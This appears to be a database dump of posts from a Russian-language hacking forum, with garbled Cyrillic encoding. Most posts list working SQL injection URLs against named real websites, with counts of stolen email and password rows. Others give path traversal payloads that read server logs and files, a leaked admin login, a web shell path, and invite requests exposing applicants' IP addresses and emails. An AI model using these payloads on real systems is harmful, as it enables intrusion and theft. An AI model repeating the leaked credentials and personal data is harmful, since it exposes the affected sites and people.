Detail&nid=13372999999.9\' union all select 1,2,[t],4,5,6,7,8,9,10,11,12,13,14 and \'0\'=\'0&Fleet=RS700\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:19,703\r\n[5,969] rsclassassoc.memberslist\r\n[5,077] rsclassassoc.boatregister\r\n[2,772] rsclassassoc.onlineentries\r\n[2,649] rsclassassoc.news\r\n[853] rsclassassoc.gallery\r\n[765] rsclassassoc.calendar\r\n[619] rsclassassoc.calendar_copy\r\n[252] rsclassassoc.forsale\r\n[150] rsclassassoc.clubinfo\r\n[88] rsclassassoc.committee\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[59] rsclassassoc.1forumusers\r\n[45] rsclassassoc.coaches\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[26] rsclassassoc.champs_contacts\r\n[25] rsclassassoc.technical\r\n[21] rsclassassoc.crewregister\r\n[18] rsclassassoc.adminlist\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\n[1] rsclassassoc.clubinfo_holding\r\nTotal Rows:25,690\r\nSearch:admin\r\nRows:5,987\r\n[5,969] rsclassassoc.memberslist\r\n[18] rsclassassoc.adminlist\r\nTotal Rows:26,333\r\nSearch:password\r\nRows:643\r\n[252] rsclassassoc.forsale\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[59] rsclassassoc.1forumusers\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[18] rsclassassoc.adminlist\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\nTotal Rows:31,260\r\nSearch:user\r\nRows:4,927\r\n[1,253] rsclassassoc.6forummessages\r\n[1,084] rsclassassoc.1forummessages\r\n[665] rsclassassoc.7forummessages\r\n[242] rsclassassoc.0forummessages\r\n[189] rsclassassoc.6forumtopics\r\n[161] rsclassassoc.7forumtopics\r\n[152] rsclassassoc.1forumtopics\r\n[122] rsclassassoc.4forummessages\r\n[118] rsclassassoc.2forummessages\r\n[104] rsclassassoc.8forummessages\r\n[94] rsclassassoc.0forumtopics\r\n[91] rsclassassoc.3forummessages\r\n[73] rsclassassoc.7forumusers\r\n[65] rsclassassoc.6forumusers\r\n[61] rsclassassoc.2forumtopics\r\n[59] rsclassassoc.1forumusers\r\n[56] rsclassassoc.4forumtopics\r\n[54] rsclassassoc.8forumtopics\r\n[39] rsclassassoc.3forumtopics\r\n[39] rsclassassoc.4forumusers\r\n[38] rsclassassoc.2forumusers\r\n[38] rsclassassoc.3forumusers\r\n[35] rsclassassoc.0forumusers\r\n[26] rsclassassoc.5forummessages\r\n[20] rsclassassoc.admins\r\n[17] rsclassassoc.5forumtopics\r\n[16] rsclassassoc.8forumusers\r\n[10] rsclassassoc.5forumusers\r\n[6] rsclassassoc.newscomments\r\n\r\nestagiarios.com\r\nURL:http://www.estagiarios.com/inscrpromo.asp?id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:956,472\r\n[730,065] estagiarios.tbl_excluidos\r\n[115,522] estagiarios.alunos\r\n[37,336] estagiarios.seguros\r\n[24,510] estagiarios.contratos\r\n[24,066] estagiarios.empresas\r\n[17,737] estagiarios.tbl_indica\r\n[3,985] estagiarios.tbl_email_mkt\r\n[1,891] estagiarios.tbl_jornalista\r\n[611] estagiarios.buscas\r\n[299] estagiarios.tbl_email_bloqueio\r\n[221] estagiarios.depoimentos\r\n[211] estagiarios.escolas\r\n[16] estagiarios.tbl_mailling_removidos\r\n[2] estagiarios.vagas\r\nTotal Rows:956,510\r\nSearch:admin\r\nRows:38\r\n[38] estagiarios.rotinas_agenda\r\n\r\nprokits.com.tw\r\nURL:http://www.prokits.com.tw/en/product/product_browse.asp?catid=16\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:299\r\n[118] EC.Unsub\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\nTotal Rows:480\r\nSearch:admin\r\nRows:181\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\nTotal Rows:661\r\nSearch:password\r\nRows:181\r\n[107] EC.members\r\n[60] EC.members_cl\r\n[14] EC.members_tw\r\n\r\nipgmcc.com.br\r\nURL:http://www.ipgmcc.com.br/index.asp?id=9\' and [t] and \'1\'=\'1\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:426\r\n[426] h1internet1_ipgmcc.cadastropj\r\n\r\nstfrancisce.com\r\nURL:http://www.stfrancisce.com/insight/registry/classlist.asp?catID=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:38,789\r\n[29,115] stfrancis.Profile\r\n[6,764] stfrancis.Class\r\n[2,602] stfrancis.profileExt_activities\r\n[244] stfrancis.Instructor\r\n[60] stfrancis.DistrictClientRep\r\n[3] stfrancis.Contact\r\n[1] stfrancis.Client\r\nTotal Rows:67,938\r\nSearch:password\r\nRows:29,149\r\n[29,115] stfrancis.Profile\r\n[34] stfrancis.Users\r\nTotal Rows:930,185\r\nSearch:user\r\nRows:862,247\r\n[294,375] stfrancis.Tran\r\n[123,092] stfrancis.Registration\r\n[111,288] stfrancis.ReservationAgeGrp\r\n[85,262] stfrancis.ReservationSpaceXref\r\n[33,066] stfrancis.StatementDetail\r\n[29,115] stfrancis.Profile\r\n[27,999] stfrancis.ReservationFacilityXref\r\n[27,863] stfrancis.ReservationDate\r\n[26,751] stfrancis.Reservation\r\n[26,484] stfrancis.ActionLog\r\n[17,424] stfrancis.ProfileFamily\r\n[14,015] stfrancis.Attendance\r\n[6,867] stfrancis.Course\r\n[6,841] stfrancis.answers\r\n[6,764] stfrancis.Class\r\n[3,923] stfrancis.Statement\r\n[3,544] stfrancis.ClassFeeXref\r\n[3,205] stfrancis.Payment\r\n[2,671] stfrancis.Fee\r\n[2,602] stfrancis.profileExt_activities\r\n[2,602] stfrancis.profileExt_medical\r\n[1,539] stfrancis.ClassSpaceXref\r\n[1,388] stfrancis.Category\r\n[679] stfrancis.ReservationConflictHolding\r\n[634] stfrancis.SpaceFeeTypeXref\r\n[491] stfrancis.Space\r\n[318] stfrancis.BatchQueue\r\n[244] stfrancis.Instructor\r\n[214] stfrancis.AttendanceFeeXref\r\n[210] stfrancis.SystemCodes\r\n[176] stfrancis.Facility\r\n[86] stfrancis.DistrictClient\r\n[75] stfrancis.ClassProgramRateXref\r\n[74] stfrancis.AcctCode\r\n[66] stfrancis.ServiceCat\r\n[60] stfrancis.DistrictClientRep\r\n[55] stfrancis.ProfileImmunization\r\n[40] stfrancis.Form\r\n[40] stfrancis.ProgramRate\r\n[32] stfrancis.question\r\n[30] stfrancis.questionMap\r\n[16] stfrancis.ReservationSchoolXref\r\n[5] stfrancis.Structure\r\n[4] stfrancis.ClientMsg\r\n[3] stfrancis.Contact\r\n[3] stfrancis.Department\r\n[2] stfrancis.AvailabilitySched\r\n[2] stfrancis.FormProductXref\r\n[2] stfrancis.Product\r\n[2] stfrancis.ProductCategory\r\n[2] stfrancis.questionnaire\r\n[1] stfrancis.AwardViolation\r\n[1] stfrancis.Client\r\n\r\nkochssteeringwheels.com\r\nURL:http://www.kochssteeringwheels.com/productcart/pc/viewPrd.asp?idcategory=[t]&idproduct=71\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:275\r\n[265] kochssteeringwheels.products\r\n[4] kochssteeringwheels.customers\r\n[1] kochssteeringwheels.affiliates\r\n[1] kochssteeringwheels.echo\r\n[1] kochssteeringwheels.emailSettings\r\n[1] kochssteeringwheels.payTypes\r\n[1] kochssteeringwheels.settings\r\n[1] kochssteeringwheels.suppliers\r\nTotal Rows:278\r\nSearch:admin\r\nRows:3\r\n[3] kochssteeringwheels.admins\r\nTotal Rows:297\r\nSearch:password\r\nRows:19\r\n[5] kochssteeringwheels.ShipmentTypes\r\n[4] kochssteeringwheels.customers\r\n[3] kochssteeringwheels.admins\r\n[1] kochssteeringwheels.affiliates\r\n[1] kochssteeringwheels.authorizeNet\r\n[1] kochssteeringwheels.protx\r\n[1] kochssteeringwheels.tclink\r\n[1] kochssteeringwheels.Trine\r\n[1] kochssteeringwheels.ups_license\r\n[1] kochssteeringwheels.verisign_pfp\r\nTotal Rows:305\r\nSearch:user\r\nRows:8\r\n[5] kochssteeringwheels.ShipmentTypes\r\n[1] kochssteeringwheels.PSIGate\r\n[1] kochssteeringwheels.ups_license\r\n[1] kochssteeringwheels.verisign_pfp\r\n\r\nsnlaw.com\r\nURL:http://www.snlaw.com/news/detail.asp?typ=news&id={576E294E-3EB1-4886-953F-3631784C8447}\' or 1=[t] and \'1\'=\'1\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:30\r\n[24] spenglerwww.Attorney\r\n[3] spenglerwww.Admin\r\n[3] spenglerwww.Administration\r\nTotal Rows:95\r\nSearch:admin\r\nRows:65\r\n[59] spenglerwww.News\r\n[3] spenglerwww.Admin\r\n[3] spenglerwww.Administration\r\nTotal Rows:98\r\nSearch:password\r\nRows:3\r\n[3] spenglerwww.Admin\r\n\r\nmonforteturismo.com.br\r\nURL:http://www.monforteturismo.com.br/index.asp?id=2999999.9\' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,[t],16,17,18,19,20,21,22 and \'0\'=\'0\r\nMethod:MySQL Union\r\nSearch:email\r\nRows:267\r\n[191] h1internet_monfortetur.lz_visitor_browsers\r\n[40] h1internet_monfortetur.lz_ticket_messages\r\n[16] h1internet_monfortetur.cotas\r\n[6] h1internet_monfortetur.lz_visitor_chats\r\n[3] h1internet_monfortetur.atendentes\r\n[3] h1internet_monfortetur.lz_predefined\r\n[2] h1internet_monfortetur.config\r\n[2] h1internet_monfortetur.lz_operators\r\n[1] h1internet_monfortetur.casamentos\r\n[1] h1internet_monfortetur.livro\r\n[1] h1internet_monfortetur.lz_data_updates\r\n[1] h1internet_monfortetur.lz_groups\r\nTotal Rows:269\r\nSearch:password\r\nRows:2\r\n[2] h1internet_monfortetur.lz_operators\r\n\r\ngardencitymi.org\r\nURL:http://www.gardencitymi.org/faqs/faq_home.asp?p=parks&id=[t]\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:45\r\n[36] GrdnCity_Backup.Staff\r\n[7] GrdnCity_Backup.Council\r\n[2] GrdnCity_Backup.Water_ReqforService\r\nTotal Rows:81\r\nSearch:admin\r\nRows:36\r\n[36] GrdnCity_Backup.Staff\r\n\r\natlanticingredients.com\r\nURL:http://www.atlanticingredients.com/services.asp?id=[t]&servicename=Technical Services\r\nMethod:MS SQL Error\r\nSearch:email\r\nRows:280\r\n[278] atlanticingredients.orders\r\n[1] atlanticingredients.master\r\n[1] atlanticingredients.tblCalendar\r\nTotal Rows:283\r\nSearch:admin\r\nRows:3\r\n[3] atlanticingredients.tblUsers\r\nTotal Rows:286\r\nSearch:password\r\nRows:3\r\n[3] atlanticingredients.tblUsers\r\n\r\nstoryplace.org\r\nURL:http://www.storyplace.org/preschool/activities/gorillasonact.asp?themeid=[t]\r\nMethod:MySQL Error\r\nSearch:email\r\nRows:10,719\r\n[10,719] newstoryplace.tblemail\r\n\r\ngreenforce.com.pk\r\nURL:http://greenforce.com.pk/page.aspx?page_id=999999.9 union all select 1,2,3,4,[t],6,7\r\nMethod:MS SQL Union\r\nSearch:email\r\nRows:320\r\n[153] webente_GFDB.tblOrders\r\n[117] webente_GFDB.tblNewsletterEmail\r\n[49] webente_GFDB.tblmembers\r\n[1] webente_GFDB.tblemails\r\n\r\n[/CODE]', 1, 0, '', 0, 1, 0, 0, 0),
(1775, 1083, 1770, 'kx00', 6, '', 1408897525, 'Òðрøú Ѡûþóðüø тðú ÑÂõñõ... \nhxxp://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=&p1=../../../../../../../../../../../var/toralog/tra-w6s-cojp/access-14-08-25.log%00 <== ýð 25 чøÑÂûþ ðúтуðûьýþ(ûþóø Ñ toranoana.co.jp ÑÂõрòõрð). ÿðÿúð /tra-w6s-cojp/ üõýÑÂõтÑÂѠÿþÑÂтþÑÂýýþ(5-7 ÑÂõú) ôøðÿð÷þý þт tra-w0s-cojp ôþ tra-w9s-cojp, Ñ‚.õ. þт 0 ôþ 9. ýуöõý ÑÂúрøÿтøú Ѡцøúûþü ôûѠþñýþòûõýøÑÂ. \núþрþчõ php ôûѠ÷ðûøòúø шõûûð чõрõ÷ ûþóø ýõ ðúтуðûьýþ. perl, python òþ÷üþöýþ ýõ ýõ фðúт(ÿытðÃȄÂÑÂ).\nxss ðúтøòúу üþöýþ ÷ðüутøть ÿþñðûþòðтьÑÂÑÂ)\n\nÿðрðüõтры ôûѠфðùûð ûþóþò þÑÂýþòýþóþ ôþüõýð toranoana.jp\nhxxp://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=&p1=../../../../../../../../../../../var/toralog/tra-w6s/access-14-08-25-AM.log%00 -//--//-', 1, 1, '', 0, 1, 0, 0, 0),
(1776, 1083, 1119, 'w0rm', 1, '', 1408898548, '%b %#d, %Y - %a, %I:%M %p Apr 11, 2009 - Sat, 06:27 PM \nцøтðтð òøúøÿõôøø AM/PM\n\núÑÂтðтø úðú üþöõшь ÷ðüõтøть - \n[code]\n#!/usr/local/bin/perl\n# $Id: login.cgi 13814 2006-02-28 06:33:22Z funa $ #\n#\n# loginNew.cgi\n#\nuse lib \"/web/plib\";\nuse lib \"/web/order\";\n\nuse TcsLog;\nuse TcsLogLocal;\nuse IdCrypt13;\nuse R5::ItemDel;\n[/code]\ncgi ýõ øýúûуôøтÑÂÑÂ)\n\nÿðрð ÑÂûþò þ ÷ðÿрþÑÂðх :\n\n[php]\n\n ($out{mycgi_path},$out{mycgi_name})=&ShUtl_R::GetSearchPath($out{item_kind});\n\n #$out{mycgi_name}=\"d_search.cgi\";\n if( $out{item_kind} eq \'2101\' ){\n $out{noimg_thispath}=\n qq{};\n $out{img_thispath}=\n qq{ };\n }\n elsif( $out{item_kind} eq \'2102\' ){\n $out{noimg_thispath}=\n qq{ };\n $out{img_thispath}=\n qq{ };\n }\n elsif( $out{item_kind} eq \'2103\' ){\n#&TcsLog::DBGprintL(__FILE__,__LINE__,\"MDI=$out{mdi},$out{search_media}\\n\");\n $out{noimg_thispath}=\n qq{ };\n $out{img_thispath}=\n qq{ };\n }\n elsif( $out{item_kind} =~ /^22/ ){\n $out{noimg_thispath}=\n qq{ };\n $out{img_thispath}=\n qq{ };\n\n }\n elsif( $out{item_kind} =~ /^04/ ){\n if( $out{makAg} == 1 ){\n $makAg = \"&makAg=1&p1=$out{p1}&p2=$out{p2}&p3=$out{p3}\";\n }\n else{\n $makAg = \"\";\n }\n $out{noimg_thispath}=\n qq{ };\n $out{img_thispath}=\n qq{ };\n }\n else{\n $out{noimg_thispath}=\n qq{ };\n $out{img_thispath}=\n qq{ };\n[/php]', 1, 0, '', 0, 1, 0, 0, 0),
(1777, 1572, 0, 'Invite', 2, '{$name}', 1408901327, '[SIZE=\'4\'][COLOR=\'Sienna\']Recent[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 668670133\n[b]e-mail[/b]: recen7@gmail.com\n[b]Info[/b]: Hello. I am Recent. I have been in the scene for over 10 years now. I started my scene interest with the original starcraft, and was assisting a community that made .dll\'s to inject into the game engine to cheat online @ battle.net. From there I joined h4cky0u and was long standing VIP there, though I mostly idled in the IRC sharing new exploits, gaining access to hundreds of webservers through various exploits (usually SQL injections, LFI escalated to RFI, or just straight and simple RFI\'s). I\'ve stayed a bit away from the scene since h-y was completely disbanded. I can read and modify the following languages: C, C++, C#, Java, PHP, ASP, and the various related languages. I\'m currently a member on a few crappy public forums and I really don\'t enjoy the kind of scene that they provide (opensc, trojanforge, hf). \r\n\r\nI am seeking new things to have fun with, not some script kiddie bullshit like that which is all over the internets with \"booters\" and crappy ripped recompiled and reskinned versions of darkcomet and dbot lol.\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 99.56.220.255\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1778, 1083, 1119, 'w0rm', 1, '', 1408903870, '[code]\nview-source:http://www.toranoana.jp/cgi-bin/R2/d_search.cgi?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../..//web/cgi-bin/get_hosp.pl%00.jpg?item_kind=0402&mak=S.C.X&img=&stk=1&makAg=1&p2=40&p3=5730303934303738&p1=../../../../../../../../../..//web/cgi-bin/get_hosp.pl%00.jpg\n[/code]\nø тут ѠÿþýÑÂû чõü ÑÂтþт ÑÂðùт øýтõрõÑÂõý, øщõü ÑÂтðрыõ ôþñрыõ ÑÂøÑÂтõüýы òы÷þòы чõрõ÷ ÿõрû, òÑÂõ чтþ øüõõт @ system evil ÿрþòõрÑÂõü. |id|; ôûѠтõх úтþ ýõ ÿþüýøт)\n\n\n\nsub _setcookie \n{\n my( $html,$id,$cookie_key, $cookie_value,$afg_key,$afg_value ) = @_;\n my $cookie;\n\nòрþôõ úðú ôûöýы òыÿþûýÑÂÑ‚ÑÂѠчõрõ÷ úуúø.', 1, 0, '', 0, 1, 0, 0, 0),
(1779, 1573, 0, 'Invite', 2, '{$name}', 1408903966, '[SIZE=\'4\'][COLOR=\'Sienna\']gearman[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: gmail@exploit.im\n[b]e-mail[/b]: yourname@i2pmail.org\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 128.204.199.209\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://gearman.info | gearman.info \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1780, 1016, 1018, 'opensc', 40, '', 1408909747, 'ýõ тþт фðùû ÷ðûøûø', 1, 0, '', 0, 1, 0, 0, 0),
(1781, 1017, 1020, 'opensc', 40, '', 1408910207, 'ûøýú ÑÂôþх', 1, 0, '', 0, 1, 0, 0, 0),
(1782, 1574, 0, 'Invite', 2, '{$name}', 1408915135, '[SIZE=\'4\'][COLOR=\'Sienna\']char[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: charstar\n[b]e-mail[/b]: charstar2@safe-mail.net\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 151.49.198.221\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://char.net | char.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1783, 1575, 0, 'Invite', 2, '{$name}', 1408917789, '[SIZE=\'4\'][COLOR=\'Sienna\']Dr.SHANO[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: Fb.me/Shano.Dr\n[b]e-mail[/b]: xss@live.fr\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.230.242.215\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/albums204586032 | http://vk.com/albums204586032 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1784, 1576, 0, 'Invite', 2, '{$name}', 1408955827, '[SIZE=\'4\'][COLOR=\'Sienna\']KingJulien[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: kingjulien2013@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 89.97.106.186\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1785, 1577, 0, 'Psych0tr1a', 11, 'mystery.bigmir.net', 1408957591, '[B]SQLi[/B]\r\n[code]http://mystery.bigmir.net/game/frames/spells_book.php?type=1\'&id=-501+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+[/code]\r\n\r\n[B]çøтðûúð фðùûþò ø ôøрõúтþрøù.[/B]\r\n[code]http://mystery.bigmir.net/game/frames/show_cw_result.php?id=3940180120141542../../../../../game/admin/sql_tester/access.inc[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(1786, 1578, 0, 'Invite', 2, '{$name}', 1408961591, '[SIZE=\'4\'][COLOR=\'Sienna\']Silverfox[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: ecapellari@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.128.58.10\n[*][b]real ip[/b]: 217.128.58.10\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://silverfox.net | silverfox.net \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1787, 1579, 0, 'Psych0tr1a', 11, 'She.com', 1408963261, '=================\n=================\n[B]59.188.87.208[/B]\n[code]features.she.com\n\n[B]à ðÑÂúрытøõ:[/B]\n/var/www/html/she.com/www.she.com/features/diva/libraries/adodb_lite/adodb-errorhandler.inc.php[/code]\n=================\n=================\n[B]59.188.87.209[/B]\n[code]hair.she.com\nk.she.com\nmembers.she.com\nwatches.she.com\n\n[B]SQLi:[/B]\nhttp://hair.she.com/style/style-library/view.php?id=999999.9+union+select+1,2,3,4,user(),6,7,8,9,10+--+\n\nuser()=root@192.168.1.222\n\n[B]SQLi:[/B]\nURL: http://members.she.com/account/retrieve_username.php\nPOST DATA: altemail=%27or(ExtractValue(1,concat(0x3a,(user()))))+--+&submit=send+me+my+username\n\n[B]à ðÑÂúрытøõ:[/B]\nhttp://watches.she.com/details.php?id=867\'\n\n\n/var/www/html/she.com/members.she.com/librarys/adodb_lite/adodb-errorhandler.inc.php[/code]\n=================\n=================\n[B]59.188.87.214[/B]\n[code]blog.she.com\n\n[B]à ðÑÂúртøõ:[/B]\n/var/www/html/blog.she.com/html/wp-content/themes/koresponsive/sidebar.php[/code]\n=================\n=================\n[B]59.188.87.218[/B]\n[code]betterhk.she.com\n\n[B]SQLi[/B]\nhttp://betterhk.she.com/press_detail.php?year=2013&id=-122%27+union+select+1,user%28%29,3,4,5+--+\n\n[B]ÃÂôüøýúð[/B]\nhttp://betterhk.she.com/admin\nadmin:Zer0zer0\n\n[B]èõûû[/B]\nhttp://betterhk.she.com/betterhongkong.org.php[/code]\n=================\n=================\n[B]59.188.87.222[/B]\n[code]brides-feature.she.com\nprochats.she.com\nk.she.com\n\n[B]SQLi:[/B]\nhttp://brides-feature.she.com/20130903/details.php?pic=1&id=-1+union+select+1,load_file(\'/etc/group\'),3,4,5,6,7,8+--+\n\n[B]à 